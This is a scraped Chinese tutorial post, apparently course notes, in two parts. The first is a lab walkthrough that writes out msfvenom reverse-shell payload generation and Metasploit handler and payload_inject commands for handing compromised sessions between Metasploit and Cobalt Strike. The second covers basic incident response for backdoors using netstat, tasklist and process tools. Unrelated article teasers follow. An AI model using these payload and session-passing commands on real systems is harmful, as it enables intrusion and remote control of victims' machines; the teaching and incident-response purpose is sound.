p72 内网安全-域横向 CSMSF 联动及应急响应初识

news2024/11/17 7:50:07

数据来源

演示案例

  • MSF&CobaltStrike 联动 Shell
  • WEB 攻击应急响应朔源-后门,日志
  • WIN 系统攻击应急响应朔源-后门,日志,流量
  • 临时给大家看看学的好的怎么干对应 CTF 比赛

案例1 - MSF&CobaltStrike联动Shell

CS下载与安装:cobaltstrike的安装与基础使用_cobalt strike windows运行_正经人_____的博客-CSDN博客

环境准备:一台kali,一台靶机(我这里为了简单一点,就用两台虚拟机,你可以在远程服务器部署CS,然后kali中运行MSF(kail自带),最后在找一台靶机) 

CS->MSF

1)先配置cs

先使用CS创建一个监听器

随便使用个监听器生成木马并上线就好(使用那个监听器生成木马上线都行,只要能上线)

2)使用msf创建监听

我这里是在kali中重新打开一个终端(msf是kali自带的)

msfconsole                         # 启动 metasploita命令行
use exploit/multi/handler          # 使用模块
set payload windows/meterpreter/reverse_http      # 这里使用的攻击载荷要与CS监听器的相同(名字并不是完全相同,同样是windows的模块 然后最后的协议一样就好reverse_http)

set lhost 192.168.22.145         # 设置监听的ip,要与cs的监听器相同

set lport 6677                    # 端口也要与cs监听器端口保持一致
run                               # 启动模块

 

然后回到cs将后门的shell转发一个给msf 

 

大概等一分钟左右就上线了

MSF->CS

1)CS创建监听器 

 

2)使用msf拿到受害者的shell会话

要使用msf创建木马然后开启监听,再把木马复制到受害者主机中上线

生成木马

#                  攻击载荷                             监听ip       监听端口   demo999.exe(生成的文件名)         
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.3 lport=9988 -f exe -o demo999.exe

开启监听

msfconsole                                        # 启动 metasploita命令行
use exploit/multi/handler                         # 使用模块
set payload windows/x64/meterpreter/reverse_tcp   # 这个攻击载荷就是上面我们使用的攻击载荷
set LHOST 192.168.1.3                             # LHOSTS为 listen host (侦听主机)代表你是谁,既kali的IP地址
set lport 9988                                    # 就是要在kali上要开启的端口,注意这里的端口要和前面生成木马文件的端口一样
run                                               # 简单理解就是把鱼钩放到河里

到靶机中执行木马

监听msf的监听情况,成功拿到shell 

3)msf获取到shell会话后的操作

background退出会话,查看当前的sessions会话

 进入模块exploit/windows/local/payload_inject,查看需要设置的参数

use exploit/windows/local/payload_inject        # 进入模块
show options                                    # 查看设置

 

设置payload,这里的payload需要与cs处监听器设置的协议保持一致

set payload windows/meterpreter/reverse_http

show options查看并设置参数,设置端口,与cs处保持一致,设置lhost为cs服务器的ip地址,载入对应的session会话

set lport 17822              # 端口需要与cs监听器端口保持一致``
set lhost 192.168.1.3       # IP设置为msf本地IP,与CS设置保持一致``
set session 1               # 最开启查看的session的id就是1

run     # 最后运行攻击模块

 

 

案例2 - WEB攻击应急响应溯源-后门,日志

故事回顾:某客户反应自己的网站首页出现被篡改,请求支援

分析:涉及的攻击面 涉及的操作权限 涉及的攻击意图 涉及的攻击方式

  • 思路1:利用日志定位修改时间基数,将前时间进行攻击分析,后时间进行操作分析
  • 思路2:利用后门WebShell查杀脚本或工具找到对应后门文件,定位第一次时间分析
netstat -ano

站在攻击者的角度,去分析。攻击者当前拿到哪些权限,网站还是系统权限。装没装杀软,用渗透者的思路去想问题。注重信息搜集,从攻击面入手查看应急响应。 

1)执行netstat -ano命令,通过开放的端口找到对应的PID。 

netstat -ano   # 查看本机开放的端口

2)执行tasklist -svc命令,通过PID找到对应的进程名称

tasklist /svc

 

3)在任务管理器,找到对应的进程

之后就可以停止服务并删除文件

4)也可以进行日志分析

p74 应急响应-win&linux 分析后门&勒索病毒&攻击_cs生成linux木马_正经人_____的博客-CSDN博客

p73 应急响应-WEB 分析 php&javaweb&自动化工具_正经人_____的博客-CSDN博客 

案例3 - Win系统攻击应急响应溯源-后门,日志,流量

分析:涉及的攻击面 涉及的操作权限 涉及的攻击意图 涉及的攻击方式

故事回顾:某客户反应服务器异常出现卡顿等情况

思路:利用监控工具分析可疑进程,利用杀毒软件分析可疑文件,利用接口工具抓流量

获取进程监控:PCHunter64

 一般的木马是没有产商信息 

但是有些伪装的很好所以这个不能作为我们判断的唯一标准,可以再借助一些其他信息辅助我们进行判断 

远程ip

可以在目标主机的命令行查看端口信息 

# 查看本机端口开放信息
netstat -an

计划任务

系统用户名

还可以借助一些杀毒软件:腾讯、360、火绒这些

获取执行列表:UserAssistView

我感觉这个软件没有 PCHunter64 好用

  

涉及资源

  • https://www.onlinedown.net/soft/628964.htm
  • https://www.cnblogs.com/xiaozi/p/12679777.html
  • http://www.pc6.com/softview/SoftView_195167.html
  • https://github.com/EricZimmerman/AppCompatCacheParser/releases/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/503493.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

数字信号处理4

昨天是星期天,休息了一天,今天继续学习: 1、连续幅度信号的量化: 一个数字信号是一个数字序列,也就是说这个数字信号就可以用有限个数字来表示。 量化:通过把每个样本值表示为一个有限的数字&#xff0c…

CRM系统建设中需关注哪些关键节点?

随着数字化时代的到来,企业越来越依赖于互联网技术和数据管理,而客户关系管理(CRM)系统已经成为企业实现数字化转型和提升客户体验的关键工具之一。然而,在构建CRM系统的过程中,一些企业常常被一些关键节点…

键树(Keyword Tree)操作(插入删除查询)-双链树C语言实现_20230508

键树(Keyword Tree)操作(插入/删除/查询)-双链树C语言实现_20230508 前言 键树称为数字查找树或者搜索提示树,树的度数d≥2,树中每个结点储存的不是完整的关键字,而是只含有组成关键字的符号,常见情况为字符或数字。…

wsl2 ubuntu ip 自动同步到windows端的vscode remote ssh(wsl2 ubuntu 静态ip 固定ip)

环境信息 ​ wsl2 中linux版本:ubuntu ​ windows版本: win10/win11 问题描述 最近装了wsl2,使用vscode远程连接wsl2时遇到了如下问题: 1、wsl2的ip无法固定 2、wsl2的ssh服务不能自动开启。 尝试了网上许多方法,…

Vue核心 Vue生命周期

1.18. Vue生命周期 1.18.1. 引出生命周期 生命周期 又名生命周期回调函数、生命周期函数、生命周期钩子是什么: Vue在关键时刻帮我们调用的一些特殊名称的函数。生命周期函数的名字不可更改,但函数的具体内容是程序员根据需求编写的。生命周期函数中的this指向是…

JUC并发编程与源码分析笔记13-AbstractQueuedSynchronizer之AQS

前置知识 公平锁和非公平锁可重入锁自旋思想LockSupport数据结构之双向链表设计模式之模板设计模式 AQS入门级别理论知识 是什么 AbstractQueuedSynchronizer:抽象的队列同步器。 用来实现锁或其他同步器组件的公共基础部分的抽象实现,是重量级基础框…

Hive知识回顾2

一、分桶表 1.1分桶表的概念 分桶表也叫做桶表,源自建表语法中bucket单词。是一种用于优化查询而设计的表类型。该功能可以让数据分解为若干个部分易于管理。 在分桶时,我们要指定根据哪个字段将数据分为几桶(几个部分)。默认规则…

人脸识别中的深度学习

深度学习在人脸识别中的应用 人脸识别的过程包括: 人脸检测人脸对齐特征提取(在数学上,实质上是:空间变换)特征度量 其中,特征提取与度量,是人脸识别问题中的关键问题,也是相关研究…

使用 ChatGPT 辅助学习——为自己找一个老师

我们每个人都有许多标签,例如高中生、成绩中等、文科,根据这些标签我和其他拥有相同标签的人分配了相同的教程、班级和老师,这可以带来效率上的提升,因为同一份教程、老师就可以服务几十上百人,而无须为每个人定制&…

软件测试工程师的核心竞争力究竟是什么?

对于测试员而言,了解自己岗位的核心竞争力是非常重要的。在职业初期,许多人认为掌握代码才是软件测试的核心竞争力,但是随着经验的增加,我们会发现真正的核心竞争力是由多个方面组成的。 首先,测试人员需要具备良好的测…

BERT 的面试题

BERT 的简介 1、BERT 是什么?它是用来做什么的? BERT(Bidirectional Encoder Representations from Transformers)是由Google开发的自然语言处理模型,是一种预训练模型,可以用于多种自然语言处理任务&…

【python自动化脚本—实现excel参数化循环调用判定结果】

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言一、需求背景二、我要做什么三、已有接口四、脚本实现五、实现效果图 前言 为提升自己的python能力,记录在工作中实现的自动化脚本,温故…

51单片机(七)定时器

❤️ 专栏简介:本专栏记录了从零学习单片机的过程,其中包括51单片机和STM32单片机两部分;建议先学习51单片机,其是STM32等高级单片机的基础;这样再学习STM32时才能融会贯通。 ☀️ 专栏适用人群 :适用于想要…

写文章的软件-一款写作文章的软件

写文章的软件 写文章的软件是一种工具,可以帮助用户轻松快速地创作高质量的文章。该软件一般包括以下几个主要功能: 写作界面:提供简洁、美观的写作界面,让用户专注于文章创作,同时可以进行排版、字体、颜色等调整。 …

力扣707. 设计链表

707. 设计链表 - 力扣(Leetcode) class MyLinkedList { public:// 定义链表节点结构体struct LinkedNode {int val;LinkedNode* next;LinkedNode(int val):val(val), next(nullptr){}};// 初始化链表MyLinkedList() {_dummyHead new LinkedNode(0); // …

BasicVSR++代码解读(分模块介绍-前向传播函数)

一、前向传播函数def forward(self, lqs): 输入:低质量序列L,shape为**(n, t, c, h, w)。 输出:HR序列,shape为(n, t, c, 4h, 4w)**。 (1)读取输入数据的维度大小     这里的n,t,c,h,w分别表示:一个bitch的图片数…

数据结构之双向链表,实现双向链表的增删改查

目录 一、双向链表的定义 1.双向链表节点的定义 2.双向链表的初始化 二、双向链表的函数接口实现 1.双链表的尾插 2.双向链表的尾删 3.双向链表的头插 4.双向链表的头删 6.双向链表在pos前面插入 7.双向链表删除pos位置的节点 8.双向链表的销毁 总结 一、双向链表的定义 双向链…

PyQt5桌面应用开发(11):摸鱼也要讲基本法,两个字,16

本文目录 PyQt5桌面应用系列鼠标不要钱,手腕还不要钱吗?PyQt5源程序python文件资源定义界面定义文件 技术要素资源文件StyleSheetsQMainWindow设置窗体几何 结论 PyQt5桌面应用系列 PyQt5桌面应用开发(1):需求分析 PyQ…

EC6110-Hi3798MV310-当贝纯净桌面-卡刷强刷固件包

EC6110-Hi3798MV310-当贝纯净桌面-卡刷强刷固件包-内有教程及短接点 特点: 1、适用于对应型号的电视盒子刷机; 2、开放原厂固件屏蔽的市场安装和u盘安装apk; 3、修改dns,三网通用; 4、大量精简内置的没用的软件&a…